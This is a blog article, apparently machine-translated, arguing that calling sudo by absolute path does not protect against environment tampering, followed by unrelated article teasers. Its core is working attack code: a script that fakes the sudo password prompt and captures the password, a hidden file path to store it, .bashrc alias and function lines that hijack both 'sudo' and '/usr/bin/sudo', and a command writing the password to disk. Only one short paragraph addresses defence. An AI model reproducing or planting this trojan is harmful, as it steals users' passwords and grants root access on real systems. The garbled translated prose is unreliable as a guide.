Is It Safe to Use an Absolute Path in The Unix-like Systems, as We Used to Think?
James MonroeThe idea of editing the user environment variables to elevate the rights in penetration testing is as old as the world. On this topic written many articles and even in books began appearing tips for using an absolute path instead of a relative. Here is an example of such a council from the relatively well-known book UNIX and Linux System Administration Handbook, 4th Edition:
You should take it as a rule with the command to specify the full name, such as /bin/su and /usr/bin/su, and not just su. This will serve as a specific protection from those programs with the name of the su, who deliberately had been prescribed in the path environment variable by an attacker intends to put together a good harvest password.
But is it safe? If you too are asked this question, you are welcome under the cut./p>
Let's order. Suppose we were on the unix-like server under a user account with limited rights. We want to get root access, but we do not know the password. For example, we tried all the usual methods of elevation through an error in the configuration and under the various exploits the kernel, but all to no avail. It would seem that no more options. However, if the user is in the group of the sudo, you can try to crank out one trick.
The idea is that on most unix-like machines sudo is used to elevate the rights temporarily. When using sudo user is required to enter his current password. Therefore, knowledge of the user's password to access to sudo gives us the root.
Almost all modern unix-like servers are using bash or zsh as the default shell. They have a config file (for example, .bashrc for bash), which are stored in your home directory. With their help, you can change almost everything in the shell environment. By default, they have the right to 644 (-rw-r ' r'). Therefore, the owner can edit them without any problems.
The bottom line is that the shells have alias`y with which commands can be shortened.
For example, the standard alias of .bashrc:
alias ll='ls -alF'
When calling ll actually ls -alF will be called. Similarly, we can proceed with sudo:
alias sudo='echo PWNED'
Then performing the sudo command on a relative path will cause what we have indicated in the alias.
Use slashes in the alias are not possible, therefore the absolute path really is a safe solution in this case. Just save the absolute path in the case of editing the PATH environment variable.
Now consider the case in which the absolute path is not a safe solution. In the configuration you can create functions that work similarly to alias except that slashes could be used in their names:
function /usr/bin/sudo() { echo PWNED }
Now the call /usr/bin/sudo will also execute our code.
The next stage is writing the script, which will behave similarly to the sudo (ask for the password and elevate user rights), but at the same time to intercept the user's password and execute arbitrary code with administrator rights.
In the end, we get the execution of the script when trying to invoke sudo through an absolute or relative path.
To get started let's writing the poisonous sudo code:
#!/bin/bash
echo -n "[sudo] password for $LOGNAME: "
read -s password
echo command='whoami'
eval "echo -e $password | sudo -S --prompt='' $command"
eval "echo -e $password | sudo -S --prompt='' $*"
It asks the user password in the sudo-style, and then stores it in a variable, executes our code with elevated privileges, and then does what the user wanted.
Now let's hide it in some inconspicuous directory (eg ~ / .local) and set it +x on the right execution (chmod + x sudo). What is the filename, in fact, does not matter to us, so it's better to call it too somehow unnoticed (e.g., .config).
With reading -s password, we read the password in the variable $password. The variable command = 'whoami' contains commands that we will perform with elevated privileges.
Construction echo -e $password | sudo -S is used here to convey our variable $password with the password to the sudo through stdin.
'prompt = ' needed to no real message 'enter the password' of sudo where displayed when we turn to it. Otherwise, it will look a little suspicious.
Now you need to find the full path to sudo using whereis. For example, /usr/bin/sudo. Let's correct .bashrc so that the sudo command and the /usr/bin/sudo run our script. To do this, write to .bashrc (somewhere in the center inconspicuously) the following code, which must be edited for yourself:
alias sudo='~/.local/.config'
function /usr/bin/sudo() { eval "~/.local/.config $*" }
Profit. Now we will try to save the user's password to a file. To do this, replace the current command.
command="echo $password > ~/.local/.1"
Everything worked out, qwerty123 is the user's password. It remains still a lot of special cases in which our script may behave incorrectly. For example, sudo su or sudo 'help. Since in this paper we consider only the possibility of implementing such an attack, the process of bringing it to shine, I shifted to the shoulders of the reader.
Now you know that the use of the absolute path to unix-like systems is not so safe.
Now the central question: how to protect themselves from possible attacks? In my opinion, the best option would be to allow editing .bashrc only under root. Of course, there is a second choice, but it is less convenient and safe: to constantly check the integrity of the configs.
James Monroe
Did you know you could start your own business today? Right now? A small business doesn't need months of planning and market research to get started. If you want, you don'.
With 
Statistically, 25% of adults in the UK will have a mental health problem this year. Mental illness is an epidemic in our society, especially among men, and it is only over the la.
Aside from being an essential for life, food, and cooking generally, occupies a unique space in human culture. It has something that we have developed way beyond the basic necessity that food began as, to something which we can say we truly enjoy. But, beyond that, it&r.
Scientists have confirmed that the single best way to lessen your impact on the environment is to switch to a plant-based, non-dairy diet. This has come from research which worry.
Gentrification, from the French gritty meaning ‘of gentle birth’ and used in English to describe a person of high-class i.e. a gentleman, is the process in which hous.
Science is all about trial and error. When one theory, once thought to be fact, is proven wrong by a second, the latter replaces the former as the new fact. Each time, scientists.
Scientists estimate that we are less than 100 years from off-world living becoming a real possibility for humans. Coupled with the recent environmental deadline, which .
When people think of medicine and the healthcare industry in general, and doctors in particular, what they envision is being healed from any illness or injury. Most people don't think twice about tru.
The first utterance of ‘millionaire’ to describe a wealthy person was used for John Law (1671-1729). Over the last few centuries the millionaires have multiplied to a.
When I think about the jobs my grandparents did, I feel a sense of relief wash over me. My great-grandad was a miner and I couldn’t fathom his youth. He used to walk five m.
If, like me, you’re northern, when visiting London you might find yourself taking a sip of a deliciously crisp pint only to spit it out in surprise when the bartender hits .
The policies of US President Donald Trump have deep implications, not just for the United States, but also for the wider world. He has taken the .
The introduction of robotics into the working environment is nothing new. The use of automation in business goes back as far as the first conveyor belt production line by Henry T.
Thanks to the development of AI and IoT technologies, the use of robots in manufacturing and industry has risen considerably between 2016 and 2017. In fact, the worldwide shipment of robots rose
There are certain new technologies that are very much on trend at the moment. These are techs that dominates conversations and is at the centre of media excitement, leading to much hype, fevered speculatio.
Ever since the space race (that ended in 1969) territories beyond Earth have been deemed to be one of final frontiers of human conquest. But how possible is it that space travel .
(Technology 3D print car via Pixabay)
When it comes to new technology, I often find myself asking whether or not it is really necessary. The need for convenience in a fast-pac.
(Img src: 
(Sunrise space outer via Pixabay)
It seems almost a lifetime ago that the US and Russia were locked in a desperate struggle to reach space. Fifty years hence, and it seems we .
At some point in life, everyone gets an idea of starting their own business – be it that of dealing in diamonds, opening a restaurant or simply starting a bar they always wanted to open! It is always exciting to start a small business of your own and dreaming about it.
One of the most challenging tasks in computer programming is developing an OS and frankly, is not for everyone except the most hard core geekheads among you.
In order to start with creating your very own OS let us start by viewing the basic definitions of what a BIOS or boot loader is and does.
An operating.
Everyone knows that DeepMind's AlphaGo defeated 18 times world champion Lee Sedol on March 9 2016 at the ancient Chinese game- Go. What’s fascinating is that the game of Go has as many possible moves as there are atoms in the universe.
This motivated us to find out more about AlphaGo.
Medicine is the most rapidly growing area of expertise. In recent decades, new technologies and scientific discoveries have changed the idea of the body and its diseases and at the same time the approach to the treatment of the whole person.
The first three industrial revolutions were triggered by steam, electricity, and, and wired computers which transformed people’s way of life and manufacturing and brought digital capabilities to billions of people.
We all have stories about working in dysfunctional offices, with wacky colleagues and under stressful deadlines. But even this cannot compare to working in a conflict zone, a place that is ravaged by war.
George R.R. Martin is an American novelist, fantasy, sci-fi and short story writer. Most of the world got acquainted with him after screen adaptation of his epic saga "a Song of Ice and Fire".
This review is dedicated to the 
Automattic Company, the developer of WordPress, will no longer spend money on maintaining the office in San Francisco.
It seems that many years have passed, which made an eternity by the standards of the world of computer technology. And the reflection on past mistakes does not stop. And what would have happened if...
Millions of American families buy automatic voice assistants to turn off the lights instead of themselves, order pizza and show movie program in the cinema.
The data about critical vulnerabilities in WordPress were published - they allow remote execution of shell commands and resetting the administrator password through the substitution of the Host header.
More than 60,000 computers were attacked and infected with a virus-extortionist Wana Decrypt0r.
At some time, I had to work with one of the document-oriented DBMS – Apache CouchDB, but I had some difficulties with the search of the documentation.
